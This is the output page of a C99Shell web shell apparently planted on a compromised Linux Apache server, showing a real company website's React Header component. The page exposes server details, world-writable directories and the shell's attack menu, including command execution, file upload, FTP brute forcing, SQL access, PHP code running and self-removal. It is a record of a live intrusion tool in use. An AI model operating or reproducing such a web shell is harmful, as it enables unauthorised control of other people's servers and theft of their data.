!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/pmb/src/components/   drwxrwxrwx
Free 13.06 GB of 57.97 GB (22.54%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Header.js (3.29 KB)      -rwxrwxrwx
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
import { Link } from "react-router-dom";
function Header() {
  const style = {
    withTitle: {
      fontSize: "20px",
      fontWeight: 700,
      lineHeight: "1.1em",
      color: "#E91A2F",
    },
    withTitle2: {
      fontSize: "15px",
      fontWeight: 400,
      lineHeight: "1em",
      color: "#FFFFFF",
    },

    title: {
      fontSize: "15px",
      fontWeight: 700,
      lineHeight: "1em",
      color: "#FFFFFF",
    },
  };
  return (
    <>
      <header id="topnav" className="defaultscroll sticky">
        <div className="container">
          <div>
            <a className="logo" href="">
              <img src="images/pmb-logo.png" height="40" alt="" />
            </a>
          </div>
          <div className="buy-button">
            <a href="#" target="_blank" className="btn btn-primary">
              Get Started
            </a>
          </div>
          <div className="menu-extras">
            <div className="menu-item">
              <a className="navbar-toggle">
                <div className="lines">
                  <span></span>
                  <span></span>
                  <span></span>
                </div>
              </a>
            </div>
          </div>
          {/* const links = ['link1', 'link2', 'link3']; const [active, setActive] =
          useState(null);
          <ul>
            {links.map((link) => (
              <li className="nav-item">
                <a
                  href={`#${link}`}
                  className={`nav-link ${active == link && "m-active"}`}
                  onClick={() => setActive(link)}
                >
                  {link}
                </a>
              </li>
            ))}
          </ul> */}
          <div id="navigation">
            <ul className="navigation-menu">
              <li>
                <Link to="/">HOME</Link>
              </li>
              <li>
                <Link to="/about">ABOUT US</Link>
              </li>
              <li class="has-submenu">
                {/* <a href="#">SERVICES</a> */}
                <a href="javascript:void(0)">SERVICES</a>
                <span class="menu-arrow"></span>
                <ul class="submenu">
                  <li>
                    <Link to="/service">A-Z TERMINATION</Link>
                  </li>
                  <li>
                    <Link to="/service">SOFTSWITCHES</Link>
                  </li>
                  <li>
                    <Link to="/service">MANAGE IT SERVICES</Link>
                  </li>
                  <li>
                    <Link to="/service">VOIP RESELLER</Link>
                  </li>
                  <li>
                    <Link to="/service">SMS HUBBING</Link>
                  </li>
                </ul>
              </li>
              <li>
                <Link to="/client">OUR CLIENTS</Link>
              </li>
              <li>
                <Link to="/contact">CONTACT US</Link>
              </li>
            </ul>
            <div className="buy-menu-btn d-none">
              <Link to="/contact" className="btn btn-primary">
                CONTACT US
              </Link>
            </div>
          </div>
        </div>
      </header>
    </>
  );
}

export default Header;

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0232 ]--